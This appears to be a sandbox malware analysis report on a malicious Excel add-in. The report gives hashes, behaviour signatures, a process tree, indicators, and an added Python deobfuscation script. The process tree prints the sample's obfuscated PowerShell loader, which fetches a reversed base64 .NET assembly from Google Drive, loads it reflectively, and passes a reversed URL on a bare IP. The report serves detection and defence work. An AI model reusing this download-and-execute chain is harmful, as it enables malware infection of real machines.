Analysis

  • max time kernel
    120s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags
    arch:x64
    arch:x86
    image:win7-20240903-en
    locale:en-us
    os:windows7-x64
    system
  • submitted
    23-10-2024 13:30

General

  • Target

    2dad4b0d2557af1cadd3c7cb8e06f37c767c6565d2ec598a116a3063b92b0420.xlam

  • Size

    596KB

  • MD5

    6073b84bbdc3b910df55b8b42a16ab65

  • SHA1

    28c95e7d8f2fa7dee552bcc190b7ec6aaa9ea9f3

  • SHA256

    2dad4b0d2557af1cadd3c7cb8e06f37c767c6565d2ec598a116a3063b92b0420

  • SHA512

    1392956610ded25dc8e5ca50c5a15218e3a2ecdc12314ae7bf0313a47dd35c2ead7aba74fc7381542c2e107b547bbef23f9be1ea8ff653b3da1e1f951485a50d

  • SSDEEP

    12288:JJRTchjxyfDF5NYzNewgU8mLQobusNRO+IXbpwOjMbR6I6EfjOvCxicvG:JJp4j2FYReBm9bpNROtgt6zErkC7vG

Score
10/10

Malware Config

Extracted (language: ps1, deobfuscated)

URLs

  • ps1.dropper
    https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur
  • exe.dropper
    https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

Signatures

  • Blocklisted process makes network request (3 IoCs)
  • Command and Scripting Interpreter: PowerShell (1 TTP, 2 IoCs)

    Runs PowerShell with its display window hidden.

  • Legitimate hosting services abused for malware hosting/C2 (1 TTP, 2 IoCs)
  • Drops file in System32 directory (2 IoCs)
  • System Location Discovery: System Language Discovery (1 TTP, 5 IoCs)

    Attempts to gather information about the victim system's language in order to infer the geographical location of that host.

  • Enumerates system info in registry (2 TTPs, 1 IoC)
  • Launches Equation Editor (1 TTP, 1 IoC)

    Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882. In this run EQNEDT32.EXE was started via COM (-Embedding) while Excel had the .xlam open and then spawned WScript.exe on a dropped .vbs (see the process tree below); Equation Editor has no legitimate reason to launch a script host, so that parent/child pair is the thing to alert on.

  • Suspicious behavior: AddClipboardFormatListener (1 IoC)
  • Suspicious behavior: EnumeratesProcesses (2 IoCs)
  • Suspicious use of AdjustPrivilegeToken (2 IoCs)
  • Suspicious use of SetWindowsHookEx (3 IoCs)
  • Suspicious use of WriteProcessMemory (12 IoCs)

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\2dad4b0d2557af1cadd3c7cb8e06f37c767c6565d2ec598a116a3063b92b0420.xlam
    1⤵
    • System Location Discovery: System Language Discovery
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:2508
  • C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
    "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
    1⤵
    • Blocklisted process makes network request
    • System Location Discovery: System Language Discovery
    • Launches Equation Editor
    • Suspicious use of WriteProcessMemory
    PID:1812
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\medicallaboratorydatinglover.vbs"
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2724
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Drops file in System32 directory
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2900
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "IeX( ('qO'+'4imageUrl = h1Shttps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur h1S;qO4w'+'ebClien'+'t = New-Object System.Net.WebC'+'l'+'ient;qO4imageBytes = qO4webClient.'+'DownloadData(qO4ima'+'geUrl);q'+'O4imageText = [S'+'ystem.Text.Encoding]::UTF8.GetString(qO'+'4imageBytes);qO'+'4startFlag = h1S<<BASE64_START>>h1S;qO4endFlag = h1S<<BASE64_END>>h1S;qO4startIndex = qO4imageTe'+'xt.IndexOf(qO4startFlag);qO4endIndex = qO4imageText.IndexOf(qO4endFlag);qO4s'+'tartIndex -ge 0 -and qO4endIndex -gt qO4startInd'+'ex;qO4startIndex += qO4startFla'+'g.Length;qO4base64Length = qO4endIndex - qO4startIndex;qO4base64Command = qO4imageText.Subst'+'ring(qO4startIndex, qO4base64Length'+');qO4base64Reversed = -join (qO4base64Command.To'+'CharArray() KyI ForEach-Object { qO4_ })'+'[-1..-(qO4base64Command.Length)];qO4commandBytes = [Syste'+'m.Convert]::FromBase64String(qO4base64Reversed);qO4loadedA'+'ssembly = [System.Reflection.Assembly]::Load(qO4commandBytes);qO4vaiMethod = [dnlib.IO.Home].GetMethod(h1SVAIh1S);qO4vaiMethod.Invoke(qO4null, @(h1Stxt.4446esabbbbbb'+'bbbbewmadam/431.871.64.891//:ptthh1S, h1Sdesativadoh1S, h1Sdesativa'+'doh1S, h1Sdesativadoh1S, h1'+'SAddInProcess32h1S, h1S'+'desativadoh1S, h1Sdesativadoh1S,h1Sdesativadoh1S,h1Sdesativadoh1S,h1Sdesati'+'vadoh1S,h1Sdesativadoh1S,h1Sdesativadoh1S,h1S1h1S,h1Sdesativadoh1S));').rePlAcE(([ChaR]113+[ChaR]79+[ChaR]52),'$').rePlAcE(([ChaR]75+[ChaR]121+[ChaR]73),[striNg][ChaR]124).rePlAcE(([ChaR]104+[ChaR]49+[ChaR]83),[striNg][ChaR]39) )"
          4⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • Drops file in System32 directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2712
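
The stage-4 PowerShell command line above is only lightly obfuscated: the script is a single string built from '+'-joined fragments, then three .rePlAcE() calls swap placeholder tokens (built from [ChaR] codes) back into "$", "|" and "'" before IeX runs it. The following Python script is an added example written for this page, not something from the sandbox report or the sample itself. It transcribes that obfuscated string, undoes the three replacements, pulls the arguments of the reflected VAI call and reverses the first one, which the sample stores backwards. It also reproduces the script's own parsing of the text it fetches from Google Drive (take what lies between <<BASE64_START>> and <<BASE64_END>>, reverse it, base64-decode it); since the downloaded file is not on this page, a constructed stand-in text is used for that part. The function names and the regular expression are mine.

```python
import base64
import re

# Stage-4 PowerShell payload transcribed from the process tree above; the sample's
# '+'-joined fragments are concatenated here exactly as PowerShell would join them.
# The sample then calls .rePlAcE() three times with tokens built from [ChaR] codes:
#   chr(113)+chr(79)+chr(52) = "qO4" -> "$"  (variable sigil)
#   chr(75)+chr(121)+chr(73) = "KyI" -> "|"  (pipeline)
#   chr(104)+chr(49)+chr(83) = "h1S" -> "'"  (string quote)
OBFUSCATED = (
    "qO4imageUrl = h1Shttps://drive.google.com/uc?export=download&id="
    "1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur h1S;"
    "qO4webClient = New-Object System.Net.WebClient;"
    "qO4imageBytes = qO4webClient.DownloadData(qO4imageUrl);"
    "qO4imageText = [System.Text.Encoding]::UTF8.GetString(qO4imageBytes);"
    "qO4startFlag = h1S<<BASE64_START>>h1S;qO4endFlag = h1S<<BASE64_END>>h1S;"
    "qO4startIndex = qO4imageText.IndexOf(qO4startFlag);"
    "qO4endIndex = qO4imageText.IndexOf(qO4endFlag);"
    "qO4startIndex -ge 0 -and qO4endIndex -gt qO4startIndex;"
    "qO4startIndex += qO4startFlag.Length;"
    "qO4base64Length = qO4endIndex - qO4startIndex;"
    "qO4base64Command = qO4imageText.Substring(qO4startIndex, qO4base64Length);"
    "qO4base64Reversed = -join (qO4base64Command.ToCharArray() KyI ForEach-Object "
    "{ qO4_ })[-1..-(qO4base64Command.Length)];"
    "qO4commandBytes = [System.Convert]::FromBase64String(qO4base64Reversed);"
    "qO4loadedAssembly = [System.Reflection.Assembly]::Load(qO4commandBytes);"
    "qO4vaiMethod = [dnlib.IO.Home].GetMethod(h1SVAIh1S);"
    "qO4vaiMethod.Invoke(qO4null, @(h1Stxt.4446esabbbbbb" "bbbbewmadam/431.871.64.891"
    "//:ptthh1S, h1Sdesativadoh1S, h1Sdesativadoh1S, h1Sdesativadoh1S, "
    "h1SAddInProcess32h1S, h1Sdesativadoh1S, h1Sdesativadoh1S,h1Sdesativadoh1S,"
    "h1Sdesativadoh1S,h1Sdesativadoh1S,h1Sdesativadoh1S,h1Sdesativadoh1S,h1S1h1S,"
    "h1Sdesativadoh1S));"
)

# Same order as the three .rePlAcE() calls in the command line.
TOKEN_MAP = [
    (chr(113) + chr(79) + chr(52), "$"),       # "qO4" -> "$"
    (chr(75) + chr(121) + chr(73), chr(124)),  # "KyI" -> "|"
    (chr(104) + chr(49) + chr(83), chr(39)),   # "h1S" -> "'"
]


def deobfuscate(obfuscated: str) -> str:
    """Undo the placeholder substitutions; String.Replace is ordinal, so str.replace matches."""
    script = obfuscated
    for token, plain in TOKEN_MAP:
        script = script.replace(token, plain)
    return script


def extract_invoke_args(script: str) -> list[str]:
    """Return the single-quoted string arguments handed to the reflected VAI method."""
    m = re.search(r"\.Invoke\(\$null, @\((.*?)\)\);", script, re.DOTALL)
    if m is None:
        raise ValueError("no Invoke() call found in script")
    return re.findall(r"'([^']*)'", m.group(1))


def recover_next_stage_url(script: str) -> str:
    """The first VAI argument is the next-stage URL written backwards; reverse it."""
    return extract_invoke_args(script)[0][::-1]


START_FLAG = "<<BASE64_START>>"
END_FLAG = "<<BASE64_END>>"


def extract_embedded_payload(text: str) -> bytes:
    """Mirror the script's parsing of the downloaded text: slice between the
    markers, reverse the slice, base64-decode it (the result is a .NET assembly
    that the script loads with Assembly.Load)."""
    start = text.find(START_FLAG)
    end = text.find(END_FLAG)
    if start < 0 or end <= start:
        raise ValueError("payload markers not found")
    start += len(START_FLAG)
    reversed_b64 = text[start:end]
    return base64.b64decode(reversed_b64[::-1])


# Constructed stand-in for the text fetched from Google Drive; the real file
# was not captured on this page, so this only exercises the parsing logic.
SAMPLE_PAYLOAD = b"constructed stand-in for the .NET assembly"
SAMPLE_DRIVE_TEXT = (
    "noise before the marker "
    + START_FLAG
    + base64.b64encode(SAMPLE_PAYLOAD).decode()[::-1]
    + END_FLAG
    + " noise after the marker"
)

if __name__ == "__main__":
    script = deobfuscate(OBFUSCATED)
    print(script)
    print("next-stage URL:", recover_next_stage_url(script))
    print("VAI arguments:", extract_invoke_args(script))
    print("embedded payload:", extract_embedded_payload(SAMPLE_DRIVE_TEXT))
```

Reversing the first VAI argument yields an http:// URL on a bare IPv4 host ending in .txt, which is the indicator worth adding to a blocklist alongside the Google Drive link in the extracted config; the fifth argument, AddInProcess32, names a legitimate .NET host binary, consistent with the later "Suspicious use of WriteProcessMemory" signature, though this page does not show the injection itself.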

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

    Filesize

    7KB

    MD5

    1a55947f9e52ea2b60d984e5d3569e44

    SHA1

    8aeeeb5c9e0c1a402de12381e6a95040fc713ebb

    SHA256

    b7a925df4629e9373c3b4a27aa236ec892addcce15c4c45cbd60f2ef3c214c48

    SHA512

    7c8cfc5ad0fe64877805b9920e6e7e6c10e6a0e01b4680efec0abe14c8aa0c15ca18ab7fd35558583c47710607c2c07ec24bbe3f734a1588a0f0b75fc955914d

  • C:\Users\Admin\AppData\Roaming\medicallaboratorydatinglover.vbs

    Filesize

    136KB

    MD5

    d62f25ced5ad03573d59a9d6fe47faef

    SHA1

    c3252d74ed8960f8372b09e170c3e679a085429b

    SHA256

    80bd9d4929c8a9f3909a7a8f143ca4f5d7e14efd477ae19e638c1d4d9e753bdc

    SHA512

    a8e676bcbd422e27bbfe87a992b42050304282c25cccc83a8950896d2b465483752d1eb7d269d4bb2b1b08e946bc09cbde150c5735e5b5f14734cf0052cf7bd6

  • memory/2508-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

    Filesize

    64KB

  • memory/2508-1-0x0000000071D6D000-0x0000000071D78000-memory.dmp

    Filesize

    44KB

  • memory/2508-16-0x0000000071D6D000-0x0000000071D78000-memory.dmp

    Filesize

    44KB